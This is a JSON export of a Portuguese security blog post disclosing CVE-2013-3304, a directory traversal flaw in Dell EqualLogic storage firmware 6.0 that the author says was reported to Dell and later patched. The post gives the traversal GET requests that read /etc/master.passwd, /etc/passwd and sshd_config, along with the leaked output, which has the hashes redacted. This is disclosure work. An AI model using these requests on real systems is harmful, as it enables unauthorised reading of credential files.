{"id":50,"date":"2013-09-01T13:05:02","date_gmt":"2013-09-01T13:05:02","guid":{"rendered":"http:\/\/www.xlabs.com.br\/blog\/?p=50"},"modified":"2021-08-27T12:06:13","modified_gmt":"2021-08-27T15:06:13","slug":"cve-2013-3304-dell-equallogic-directory-traversal","status":"publish","type":"post","link":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/","title":{"rendered":"CVE-2013-3304 Dell EqualLogic Directory Traversal"},"content":{"rendered":"\n<p>A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>Descri\u00e7\u00e3o da plataforma segundo o fabricante<\/strong><\/p>\n\n\n\n<p>Produtos EqualLogic s\u00e3o sistemas baseados em iSCSI Storage Area Network (SAN) comercializados pela Dell.<\/p>\n\n\n\n<p>Interface web do Storage<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"wp-content\/uploads\/2013\/09\/Dell-EqualLogic_index.png\"><img decoding=\"async\" width=\"850\" height=\"604\" src=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Dell-EqualLogic_index.png\" alt=\"dell-equallogic-index\" class=\"wp-image-273\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Dell-EqualLogic_index.png 850w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Dell-EqualLogic_index-300x213.png 300w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Dell-EqualLogic_index-422x300.png 422w\" sizes=\"(max-width: 850px) 100vw, 850px\" \/><\/a><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>A falha de seguran\u00e7a<\/strong><\/p>\n\n\n\n<p># Software: Dell EqualLogic<br># Vers\u00e3o: 6.0<br># Empresa: Dell Computers<br># Website: www.dell.com<br># Vulnerabilidade: Directory Traversal<br># CVE: CVE-2013-3304<br># Autor: Mauricio Corr\u00eaa<\/p>\n\n\n\n<p>## Informa\u00e7\u00f5es Adicionais ##<br>Modelo do Equipamento Testado: Dell EqualLogic PS4000<br>http:\/\/www.dell.com\/br\/empresa\/p\/equallogic-ps4000e\/pd<br>Firmware Version: 6.0<br>#########################################################################<\/p>\n\n\n\n<p>O usu\u00e1rio malicioso envia requisi\u00e7\u00f5es mal formadas para acessar arquivos sens\u00edveis dentro do sistema operacional do Hardware, possibilitando a quebra da seguran\u00e7a do NAS Storage.<\/p>\n\n\n\n<p>GET \/\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/master.passwd<\/p>\n\n\n\n<p>root:[hash] &amp;:\/root:\/bin\/sh<br>daemon:*:[hash]::0:0:The devil himself:\/:\/sbin\/nologin<br>operator:*:[hash]::0:0:System &amp;:\/usr\/guest\/operator:\/sbin\/nologin<br>bin:*:[hash]::0:0:Binaries Commands and Source:\/:\/sbin\/nologin<br>sshd:*:[hash]:0:0:SSH pseudo-user:\/var\/chroot\/sshd:\/sbin\/nologin<br>uucp:*:[hash]:UNIX-to-UNIX Copy:\/var\/spool\/uucppublic:\/usr\/libexec\/uucp\/uucico<br>nobody:*:[hash]:Unprivileged user:\/nonexistent:\/sbin\/nologin<br>grpadmin:[hash]:Group Manager Admin Account:\/mgtdb\/update:\/usr\/bin\/Cli<br>authgroup:[hash]:Group Authenication Account:\/:\/sbin\/nologin<\/p>\n\n\n\n<p>GET \/\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/p>\n\n\n\n<p>root:*:[hash]:Charlie &amp;:\/root:\/bin\/sh<br>daemon:*:[hash]:The devil himself:\/:\/sbin\/nologin<br>operator:*:[hash]:System &amp;:\/usr\/guest\/operator:\/sbin\/nologin<br>bin:*::Binaries Commands and Source:\/:\/sbin\/nologin<br>sshd:*:[hash]:SSH pseudo-user:\/var\/chroot\/sshd:\/sbin\/nologin<br>uucp:*[hash]:1:UNIX-to-UNIX Copy:\/var\/spool\/uucppublic:\/usr\/libexec\/uucp\/uucico<br>nobody:*:[hash]:Unprivileged user:\/nonexistent:\/sbin\/nologin<br>grpadmin:*:[hash]Group Manager Admin Account:\/mgtdb\/update:\/usr\/bin\/Cli<br>authgroup:*:[hash]0:Group Authenication Account:\/:\/sbin\/nologin<\/p>\n\n\n\n<p>Como foi poss\u00edvel perceber, a falha \u00e9 grave por\u00e9m n\u00e3o \u00e9 cr\u00edtica, ainda n\u00e3o sabemos a extens\u00e3o da falha pois o escopo foi limitado nestes testes, nota-se que arquivos de configura\u00e7\u00f5es de todo o sistema podem ser lidos.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"wp-content\/uploads\/2013\/09\/Directory_TraversalJPG2.jpg\"><img decoding=\"async\" width=\"1024\" height=\"521\" src=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Directory_TraversalJPG2-1024x521.jpg\" alt=\"Directory_TraversalJPG2\" class=\"wp-image-56\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Directory_TraversalJPG2-1024x521.jpg 1024w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Directory_TraversalJPG2-300x152.jpg 300w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/Directory_TraversalJPG2.jpg 1201w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>O sistema em si trata-se de um NetBSD&nbsp;podendo ser&nbsp;constatado lendo o arquivo de configura\u00e7\u00e3o do SSHD:<\/p>\n\n\n\n<p>GET \/\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/ssh\/sshd_config HTTP\/1.1<\/p>\n\n\n\n<p># $NetBSD: sshd_config,v 1.16 2002\/10\/01 14:07:47 itojun Exp $<\/p>\n\n\n\n<p>A falha foi corrigida na nova vers\u00e3o dos firmwares da linha EqualLogic da Dell.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware. Descri\u00e7\u00e3o da plataforma segundo o fabricante Produtos EqualLogic s\u00e3o sistemas baseados em iSCSI Storage Area Network (SAN) comercializados pela Dell. Interface [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1691,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[61],"tags":[18,21,68,83],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>CVE-2013-3304 Dell EqualLogic Directory Traversal &ndash; XLabs Security Blog<\/title>\n<meta name=\"description\" content=\"A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2013-3304 Dell EqualLogic Directory Traversal &ndash; XLabs Security Blog\" \/>\n<meta property=\"og:description\" content=\"A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/\" \/>\n<meta property=\"og:site_name\" content=\"XLabs Security Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/xlabs\" \/>\n<meta property=\"article:published_time\" content=\"2013-09-01T13:05:02+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-27T15:06:13+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/cve-2013-3304-dell-equalogic-directory-traversal-blog-post-xlabs.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"488\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Mauricio Corr\u00eaa\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"CVE-2013-3304 Dell EqualLogic Directory Traversal &ndash; XLabs Security Blog\" \/>\n<meta name=\"twitter:description\" content=\"A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/cve-2013-3304-dell-equalogic-directory-traversal-blog-post-xlabs.png\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mauricio Corr\u00eaa\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/\"},\"author\":{\"name\":\"Mauricio Corr\u00eaa\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\"},\"headline\":\"CVE-2013-3304 Dell EqualLogic Directory Traversal\",\"datePublished\":\"2013-09-01T13:05:02+00:00\",\"dateModified\":\"2021-08-27T15:06:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/\"},\"wordCount\":377,\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"keywords\":[\"CVE-2013-3304\",\"Dell\",\"Directory Traversal\",\"EqualLogic\"],\"articleSection\":[\"Falhas de Seguran\u00e7a\"],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/\",\"name\":\"CVE-2013-3304 Dell EqualLogic Directory Traversal &ndash; XLabs Security Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\"},\"datePublished\":\"2013-09-01T13:05:02+00:00\",\"dateModified\":\"2021-08-27T15:06:13+00:00\",\"description\":\"A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/www.xlabs.com.br\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2013-3304 Dell EqualLogic Directory Traversal\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"name\":\"XLabs Security Blog\",\"description\":\"Seguran\u00e7a da Informa\u00e7\u00e3o\",\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\",\"name\":\"XLabs Security\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"contentUrl\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"width\":478,\"height\":168,\"caption\":\"XLabs Security\"},\"image\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.instagram.com\/xlabs.security\",\"https:\/\/www.linkedin.com\/company\/xlabs-security\/\",\"https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber\",\"https:\/\/www.facebook.com\/xlabs\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\",\"name\":\"Mauricio Corr\u00eaa\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"caption\":\"Mauricio Corr\u00eaa\"},\"url\":\"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2013-3304 Dell EqualLogic Directory Traversal &ndash; XLabs Security Blog","description":"A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/","og_locale":"pt_BR","og_type":"article","og_title":"CVE-2013-3304 Dell EqualLogic Directory Traversal &ndash; XLabs Security Blog","og_description":"A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.","og_url":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/","og_site_name":"XLabs Security Blog","article_publisher":"https:\/\/www.facebook.com\/xlabs","article_published_time":"2013-09-01T13:05:02+00:00","article_modified_time":"2021-08-27T15:06:13+00:00","og_image":[{"width":1000,"height":488,"url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/cve-2013-3304-dell-equalogic-directory-traversal-blog-post-xlabs.png","type":"image\/png"}],"author":"Mauricio Corr\u00eaa","twitter_card":"summary_large_image","twitter_title":"CVE-2013-3304 Dell EqualLogic Directory Traversal &ndash; XLabs Security Blog","twitter_description":"A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell, segundo informa\u00e7\u00f5es da Dell esta falha foi consertada em uma nova vers\u00e3o de firmware.","twitter_image":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2013\/09\/cve-2013-3304-dell-equalogic-directory-traversal-blog-post-xlabs.png","twitter_misc":{"Escrito por":"Mauricio Corr\u00eaa","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/#article","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/"},"author":{"name":"Mauricio Corr\u00eaa","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d"},"headline":"CVE-2013-3304 Dell EqualLogic Directory Traversal","datePublished":"2013-09-01T13:05:02+00:00","dateModified":"2021-08-27T15:06:13+00:00","mainEntityOfPage":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/"},"wordCount":377,"publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"keywords":["CVE-2013-3304","Dell","Directory Traversal","EqualLogic"],"articleSection":["Falhas de Seguran\u00e7a"],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/","url":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/","name":"CVE-2013-3304 Dell EqualLogic Directory Traversal &ndash; XLabs Security Blog","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#website"},"datePublished":"2013-09-01T13:05:02+00:00","dateModified":"2021-08-27T15:06:13+00:00","description":"A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell.","breadcrumb":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2013-3304-dell-equallogic-directory-traversal\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/www.xlabs.com.br\/blog\/"},{"@type":"ListItem","position":2,"name":"CVE-2013-3304 Dell EqualLogic Directory Traversal"}]},{"@type":"WebSite","@id":"https:\/\/www.xlabs.com.br\/blog\/#website","url":"https:\/\/www.xlabs.com.br\/blog\/","name":"XLabs Security Blog","description":"Seguran\u00e7a da Informa\u00e7\u00e3o","publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/www.xlabs.com.br\/blog\/#organization","name":"XLabs Security","url":"https:\/\/www.xlabs.com.br\/blog\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","contentUrl":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","width":478,"height":168,"caption":"XLabs Security"},"image":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.instagram.com\/xlabs.security","https:\/\/www.linkedin.com\/company\/xlabs-security\/","https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber","https:\/\/www.facebook.com\/xlabs"]},{"@type":"Person","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d","name":"Mauricio Corr\u00eaa","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","caption":"Mauricio Corr\u00eaa"},"url":"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/"}]}},"_links":{"self":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/50"}],"collection":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/comments?post=50"}],"version-history":[{"count":24,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/50\/revisions"}],"predecessor-version":[{"id":1692,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/50\/revisions\/1692"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media\/1691"}],"wp:attachment":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media?parent=50"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/categories?post=50"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/tags?post=50"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}